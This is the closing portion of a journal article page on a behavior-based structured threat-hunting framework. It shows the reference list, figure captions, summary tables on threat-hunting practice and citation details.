  26. Top 10 Cyber Threat Intelligence Tools in 2022 Toolbox It Security. Available online: https://www.toolbox.com/it-security/vulnerability-management/articles/best-cyber-threat-intelligence-tools/. (accessed on 7 February 2022).
  27. What is Advanced Persistent Threat? Explaining APT Security. Available online: https://cybersecurity.att.com/blogs/security-essentials/advanced-persistent-threat-explained (accessed on 14 January 2022).
  28. What is C2? Command and Control Infrastructure Explained. Available online: https://www.varonis.com/blog/what-is-c2. (accessed on 2 January 2022).
  29. Elastic EDR Install Archives-On the Hunt. Available online: https://newtonpaul.com/tag/elastic-edr-install/ (accessed on 4 January 2022).
  30. Bharany, S.; Sharma, S.; Badotra, S.; Khalaf, O.I.; Alotaibi, Y.; Alghamdi, S.; Alassery, F. Energy-Efficient Clustering Scheme for Flying Ad-Hoc Networks Using an Optimized LEACH Protocol. Energies 2021, 14, 6016. [Google Scholar] [CrossRef]
  31. Kaur, K.; Bharany, S.; Badotra, S.; Aggarwal, K.; Nayyar, A.; Sharma, S. Energy-efficient polyglot persistence database live migration among heterogeneous clouds. In The Journal of Supercomputing; Springer Science and Business Media LLC.: Berlin/Heidelberg, Germany, 2022. [Google Scholar] [CrossRef]
  32. Symantec Enterprise. Threat Landscape Trends—Q3 2020. Available online: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/threat-landscape-trends-q3-2020 (accessed on 8 July 2021).
  33. Apostolopoulos, T.; Katos, V.; Choo, K.K.R.; Patsakis, C. Resurrecting anti-virtualization and anti-debugging: Unhooking your hooks. Future Gener. Comput. Syst. 2021, 116, 393–405. [Google Scholar] [CrossRef]
  34. Bharany, S.; Sharma, S.; Bhatia, S.; Rahmani, M.K.I.; Shuaib, M.; Lashari, S.A. Energy Efficient Clustering Protocol for FANETS Using Moth Flame Optimization. Sustainability 2022, 14, 6159. [Google Scholar] [CrossRef]
  35. Jang-Jaccard, J.; Nepal, S. A survey of emerging threats in cybersecurity. J. Comput. Syst. Sci. 2014, 80, 973–993. [Google Scholar] [CrossRef]
  36. Trim, P.R.J.; Lee, Y.-I. The Global Cyber Security Model: Counteracting Cyber Attacks through a Resilient Partnership Arrangement. Big Data Cogn. Comput. 2021, 5, 32. [Google Scholar] [CrossRef]
  37. Bharany, S.; Sharma, S.; Khalaf, O.I.; Abdulsahib, G.M.; Al Humaimeedy, A.S.; Aldhyani, T.H.H.; Maashi, M.; Alkahtani, H. A Systematic Survey on Energy-Efficient Techniques in Sustainable Cloud Computing. Sustainability 2022, 14, 6256. [Google Scholar] [CrossRef]
  38. Bharany, S.; Badotra, S.; Sharma, S.; Rani, S.; Alazab, M.; Jhaveri, R.H.; Reddy Gadekallu, T. Energy efficient fault tolerance techniques in green cloud computing: A systematic survey and taxonomy. Sustain. Energy Technol. Assess. 2022, 53, 102613. [Google Scholar] [CrossRef]
  39. Ghafir, I.; Saleem, J.; Hammoudeh, M.; Faour, H.; Prenosil, V.; Jaf, S.; Jabbar, S.; Baker, T. Security threats to critical infrastructure: The human factor. J. Supercomput. 2018, 74, 4986–5002. [Google Scholar] [CrossRef]
  40. Bharany, S.; Kaur, K.; Badotra, S.; Rani, S.; Kavita; Wozniak, M.; Shafi, J.; Ijaz, M.F. Efficient Middleware for the Portability of PaaS Services Consuming Applications among Heterogeneous Clouds. Sensors 2022, 22, 5013. [Google Scholar] [CrossRef]
  41. Beshley, M.; Beshley, H.; Kochan, O.; Kryvinska, N.; Barolli, L. Measuring End-to-End Delay in Low Energy SDN IoT Platform. Comput. Mater. Contin. 2021, 70, 19–41. [Google Scholar] [CrossRef]
  42. Bharany, S.; Sharma, S.; Frnda, J.; Shuaib, M.; Khalid, M.I.; Hussain, S.; Iqbal, J.; Ullah, S.S. Wildfire Monitoring Based on Energy Efficient Clustering Approach for FANETS. Drones 2022, 6, 193. [Google Scholar] [CrossRef]
  43. Metalidou, E.; Marinagi, C.; Trivellas, P.; Eberhagen, N.; Skourlas, C.; Giannakopoulos, G. The human factor of information security: Unintentional damage perspective. Procedia-Soc. Behav. Sci. 2014, 147, 424–428. [Google Scholar] [CrossRef] [Green Version]
  44. Bharany, S.; Sharma, S. Intelligent Green Internet of Things: An Investigation. In Machine Learning, Blockchain, and Cyber Security in Smart Environments; Chapman and Hall/CRC: London, UK, 2022; pp. 1–15. [Google Scholar]
Electronics 11 02992 g001 550
Figure 1. An example of threat Intelligence Report summary.
Figure 1. An example of threat Intelligence Report summary.
Electronics 11 02992 g001
Electronics 11 02992 g002 550
Figure 2. Threat intelligence report IoCs.
Figure 2. Threat intelligence report IoCs.
Electronics 11 02992 g002
Electronics 11 02992 g003 550
Figure 3. Elastic instance displaying threat logs.
Figure 3. Elastic instance displaying threat logs.
Electronics 11 02992 g003
Electronics 11 02992 g004 550
Figure 4. Threat hunt search.
Figure 4. Threat hunt search.
Electronics 11 02992 g004
Electronics 11 02992 g005 550
Figure 5. (a) Elastic Endpoint Sysmon. (b) Elastic Endpoint Sysmon script.
Figure 5. (a) Elastic Endpoint Sysmon. (b) Elastic Endpoint Sysmon script.
Electronics 11 02992 g005
Electronics 11 02992 g006 550
Figure 6. Script reported threat activities.
Figure 6. Script reported threat activities.
Electronics 11 02992 g006
Electronics 11 02992 g007 550
Figure 7. Script search results.
Figure 7. Script search results.
Electronics 11 02992 g007
Electronics 11 02992 g008 550
Figure 8. Filtering for process variables.
Figure 8. Filtering for process variables.
Electronics 11 02992 g008
Electronics 11 02992 g009 550
Figure 9. Payload analysis.
Figure 9. Payload analysis.
Electronics 11 02992 g009
Electronics 11 02992 g010 550
Figure 10. Report on VB script.
Figure 10. Report on VB script.
Electronics 11 02992 g010
Electronics 11 02992 g011 550
Figure 11. Delayed execution search and overview.
Figure 11. Delayed execution search and overview.
Electronics 11 02992 g011
Electronics 11 02992 g012 550
Figure 12. Search results for Ping and Loopback threat vectors.
Figure 12. Search results for Ping and Loopback threat vectors.
Electronics 11 02992 g012
Electronics 11 02992 g013 550
Figure 13. Filtering results.
Figure 13. Filtering results.
Electronics 11 02992 g013
Electronics 11 02992 g014 550
Figure 14. Process ID filtering results.
Figure 14. Process ID filtering results.
Electronics 11 02992 g014
Electronics 11 02992 g015 550
Figure 15. Process ID filtering results (logs).
Figure 15. Process ID filtering results (logs).
Electronics 11 02992 g015
Electronics 11 02992 g016 550
Figure 16. Threat hunting workflow.
Figure 16. Threat hunting workflow.
Electronics 11 02992 g016
Electronics 11 02992 g017 550
Figure 17. Email log review.
Figure 17. Email log review.
Electronics 11 02992 g017
Electronics 11 02992 g018 550
Figure 18. Privilege escalation identified.
Figure 18. Privilege escalation identified.
Electronics 11 02992 g018
Electronics 11 02992 g019 550
Figure 19. Hunt artifacts uncovered.
Figure 19. Hunt artifacts uncovered.
Electronics 11 02992 g019
Table
Table 1. Structured vs. unstructured threat hunting.
Table 1. Structured vs. unstructured threat hunting.
Structured Threat HuntingUnstructured Threat Hunting
  • Usually driven by a central hypothesis for a specific TTP and entity driven for detecting threats.
  • Mostly data-driven, leveraging the principle of least seen to identify anomalies in an environment.
  • Conducted on a regular and routine basis to provide ongoing assurance and protection while generating predictable results.
  • Frequently conducted on an ad hoc schedule, when time/resources permit, this can lead to rabbit-hole hunts and unpredictable results.
  • This can help identify adversarial tactics, techniques, and procedures (TTPs).
  • This helps detect and identify malware, malicious tools, network, and host-based artifacts.
  • Leads to the development of robust behavioral threat detection content creation.
  • Provides new IoCs for threat feeds and basic signature creation.
Table
Table 2. Behavior-based threat hunting literature categorization.
Table 2. Behavior-based threat hunting literature categorization.
Review PerformedStage-1Stage-2Stage-3Stage-4Overall %
Indicators of Compromise675030627.57%
Threat Hunting473521419.34%
Threat Intelligence413118416.87%
Unstructured Threat Hunt342615313.99%
Structured Threat Hunt544124522.22%
24318210922
Table
Table 3. Decision making parameters.
Table 3. Decision making parameters.
Hunt CriteriaRangeWeight
C-1: Risk category0 to 30.41
C-2: Malware 1 to 120.14
C-3: Impact potential1 to 150.1
C-4: Attack probability0 to 10.18
C-5: Breach complexity1 to 990.35
Table
Table 4. Sigma and binary output.
Table 4. Sigma and binary output.
IDTypeLog 1
1Malware1
2Intrusion1
3Phishing1
4Brute Force0
5DDoS0
Table
Table 5. Profiling enterprise threat hunting levels.
Table 5. Profiling enterprise threat hunting levels.
ProfilePercentage
Create hypothesis to drive threat hunting efforts55%
Use threat intelligence to hypothesize where threats may be found or attacks are executing 76%
Perform behavior-based hunts, using measurable improvement in overall security posture91%
Publisher’s Note: MDPI stays neutral with regard to jurisdictional claims in published maps and institutional affiliations.

Share and Cite

MDPI and ACS Style

Bhardwaj, A.; Kaushik, K.; Alomari, A.; Alsirhani, A.; Alshahrani, M.M.; Bharany, S. BTH: Behavior-Based Structured Threat Hunting Framework to Analyze and Detect Advanced Adversaries. Electronics 2022, 11, 2992. https://doi.org/10.3390/electronics11192992

AMA Style

Bhardwaj A, Kaushik K, Alomari A, Alsirhani A, Alshahrani MM, Bharany S. BTH: Behavior-Based Structured Threat Hunting Framework to Analyze and Detect Advanced Adversaries. Electronics. 2022; 11(19):2992. https://doi.org/10.3390/electronics11192992

Chicago/Turabian Style

Bhardwaj, Akashdeep, Keshav Kaushik, Abdullah Alomari, Amjad Alsirhani, Mohammed Mujib Alshahrani, and Salil Bharany. 2022. "BTH: Behavior-Based Structured Threat Hunting Framework to Analyze and Detect Advanced Adversaries" Electronics 11, no. 19: 2992. https://doi.org/10.3390/electronics11192992

Note that from the first issue of 2016, this journal uses article numbers instead of page numbers. See further details here.

Article Metrics

Back to TopTop